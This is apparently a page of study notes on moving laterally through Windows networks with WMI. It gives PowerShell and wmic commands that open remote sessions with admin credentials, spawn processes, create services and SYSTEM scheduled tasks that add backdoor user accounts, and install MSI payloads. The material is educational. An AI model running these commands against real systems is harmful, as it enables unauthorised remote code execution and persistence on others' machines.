Moving Laterally with WMI

PRACTICE ! PRACTICE ! PRACTICE !

WMI is Windows implementation of Web-Based Enterprise Management (WBEM), an enterprise standard for accessing management information across devices

In simpler terms, WMI allows administrators to perform standard management tasks that attackers can abuse to perform lateral movement in various ways

Connecting to WMI from Powershell

Before being able to connect to WMI using Powershell commands, we need to create a PSCredential object with our user and password

This object will be stored in the $credential variable

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

We then proceed to establish a WMI session using either of the following protocols

  • DCOM => RPC over IP will be used for connecting to WMI - This protocol uses port 135/TCP and ports 49152-65535/TCP, just as explained when using sc.exe

  • Wsman => WinRM will be used for connecting to WMI - This protocol uses ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

To establish a WMI session from Powershell, we can use the following commands and store the session on the $Session variable

$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop

  • The New-CimSessionOption cmdlet is used to configure the connection options for the WMI session including the connection protocol

  • The options and credentials are then passed to the New-CimSession cmdlet to establish a session against a remote host

Remote Process Creation Using WMI

  • Ports

    • 135/TCP, 49152-65535/TCP (DCERPC)

    • 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships =>Administrators

We can remotely spawn a process from Powershell by leveraging WMI, sending a WMI request to the Win32_Process class to spawn the process

$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}

Notice that WMI won't allow you to see the output of any command but will indeed create the required process silently - hence making it a blind attack

On legacy systems, the same can be done using wmic.exe from the CMD

wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe"

Creating Services Remotely with WMI

  • Ports

    • 135/TCP, 49152-65535/TCP (DCERPC)

    • 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships =>Administrators

We can create services with WMI through Powershell

  • To create a service called NxGService, we can use the following command

Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "THMService2";
DisplayName = "THMService2";
PathName = "net user munra2 Pass123 /add"; # Your payload
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}

And then, we can get a handle on the service and start it with the following commands

$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'"

Invoke-CimMethod -InputObject $Service -MethodName StartService

Finally, we can stop and delete the service with the following commands

Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete

Creating Scheduled Tasks Remotely with WMI

  • Ports

    • 135/TCP, 49152-65535/TCP (DCERPC)

    • 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships => Administrators

We can create and execute scheduled tasks by using some cmdlets available in Windows default installations

# Payload must be split in Command and Args

$Command = "cmd.exe"
$Args = "/c net user munra22 aSdf1234 /add"

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "NxGtask2"
Start-ScheduledTask -CimSession $Session -TaskName "NxGtask"

To delete the scheduled task after it has been used, we can use the following command

Unregister-ScheduledTask -CimSession $Session -TaskName "NxGtask"

Installing MSI packages through WMI

  • Ports

    • 135/TCP, 49152-65535/TCP (DCERPC)

    • 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships => Administrators

MSI is a file format used for installers in Windows Installations - If we can copy an MSI package to the target system, we can then use WMI to attempt to install it for us

Once the MSI file is in the target system, we can attempt to install it by invoking the Win32_Product class through WMI

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

We can achieve the same by us using wmic in legacy systems

wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi
PreviousSpawning Processes RemotelyNextAlternate Authentication Material

Last updated